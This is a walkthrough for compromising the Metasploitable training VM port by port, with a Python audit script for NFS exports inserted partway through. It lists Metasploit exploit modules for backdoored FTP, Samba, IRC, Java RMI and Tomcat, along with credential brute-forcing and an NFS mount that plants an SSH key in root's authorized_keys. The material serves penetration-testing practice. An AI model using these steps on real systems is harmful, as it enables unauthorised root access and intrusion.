Metasploitable OS Complete Solved

Port 21 & 2121

# Identifying the FTP version
auxiliary/scanner/ftp/ftp_version
# Exploiting 2.3.4 Backdoor
exploit/unix/ftp/vsftpd_234_backdoor

### Port 2121
systemctl start postgresql
auxiliary/scanner/ftp/ftp_login
ftp <ip> 2121

Port 22

auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login

Port 23 & 1524

auxiliary/scanner/telnet/telnet_login
### Use Wireshark to inspect the login credentials (telnet sends them in cleartext)

ncat <ip> 1524

Port 25

# SMTP
auxiliary/scanner/smtp/smtp_enum
## Verifying which enumerated users exist on the mail server

nc <machineIP> 25   # port 25 = SMTP
VRFY <username_Enumerated>

Port 53 ISC BIND (DNS)

Port 53 is used by DNS (Domain Name System), which resolves human-readable host names into numeric IP addresses. BIND (Berkeley Internet Name Domain), a commonly used DNS server, has a long history of security problems. As a result, BIND and port 53 are frequent targets, and a couple of worms have used BIND exploits to propagate.

https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain

Apache HTTPd 80

  • It hosts DVWA on the Metasploitable OS, but the web server itself can also be exploited.

nbtscan -r IPrange/24
dirb <ip>
http://<ip>/phpinfo.php
msf6 > auxiliary/scanner/http/http_version
cadaver <website>/dav/
# cadaver opens an interactive WebDAV prompt (dav:/dav/>) on the writable share

Port 111 / 2049 RPCbind and NFS

RPC - Remote Procedure Calls
NFS - Network File System

rpcinfo -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt

### Listing the filesystems
df -k

cd /mnt/root/.ssh
cp /root/.ssh/<filename>.pub /mnt/root/.ssh/

### To make an SSH connection, append our public key to the target root's
authorized_keys file on the mounted share

cat <publickey> >> authorized_keys

ssh -i /root/.ssh/<file> root@<ip>
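As an added defensive example (not part of the original notes), the following Python script parses an /etc/exports file and flags the configuration that makes the mount-and-drop-a-key procedure above possible: exports open to every host, `no_root_squash`, and the root filesystem exported read-write. The exports file is a constructed sample, not taken from any real host.

```python
import re
from dataclasses import dataclass

# Constructed sample of an /etc/exports file, modelled on the kind of
# world-readable root export the NFS section above relies on.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/            *(rw,no_root_squash)
/home/share  10.0.0.0/24(ro,root_squash,sync)
/srv/backup  *(ro)
"""

@dataclass
class Export:
    path: str
    clients: list  # list of (host, set_of_options) pairs

def parse_exports(text):
    """Parse exports(5) lines into Export records; comments and blank lines are skipped."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:]
        clients = []
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            host = m.group(1) or "*"  # an empty host part means "everyone"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            clients.append((host, opts))
        if not specs:  # a path with no client list is exported to every host
            clients.append(("*", set()))
        exports.append(Export(path, clients))
    return exports

def audit_exports(text):
    """Return (path, host, reason) findings for exports that enable the root-key attack."""
    findings = []
    for exp in parse_exports(text):
        for host, opts in exp.clients:
            if host == "*":
                findings.append((exp.path, host, "exported to every host"))
            if "no_root_squash" in opts:
                findings.append((exp.path, host, "no_root_squash lets remote root write as local root"))
            if exp.path == "/" and "rw" in opts:
                findings.append((exp.path, host, "root filesystem exported read-write"))
    return findings

if __name__ == "__main__":
    for path, host, reason in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:<12} {host:<12} {reason}")
```

Point the script at a real /etc/exports by reading the file into `audit_exports`; an empty result means none of the three risky patterns is present.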

Port 5900 VNC Viewer

auxiliary/scanner/vnc/vnc_login
vncviewer <ip>

Port 139-445 NetBIOS SSN

auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script

Port 512 513 514

  • These ports belong to the remote login "r" services (rexec on 512, rlogin on 513, rsh on 514), which let a user log in to a system that trusts the connecting host without any further authentication

sudo apt install rsh-client
rlogin -l root <ip>

Port 1099 Java RMI server

auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server

Port 3306

auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login

# On bruteforcing we get the password

mysql -u <user> -h <ip>


### Some MySQL commands
show databases;
use <database_name>;
show tables;
describe <table_name>;   # then read it with a SELECT query

Port 5432 Postgres

auxiliary/scanner/postgres/postgres_login
# Log in with the default postgres credentials
psql -h <ip> -U <username>

Port 6667 Internet Relay Chat (IRC)

service postgresql start   # (IRC requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding
show payloads
set payload <one of the ruby payloads from the list>

Port 8180 (Unknown service: Apache Tomcat)

  • Port 8180 is used by the Apache Tomcat service, which runs Java web applications on the fly.

# Try a default-credential list for Apache Tomcat logins (several are published on GitHub)
exploit/multi/http/tomcat_mgr_upload

~ Ghoul
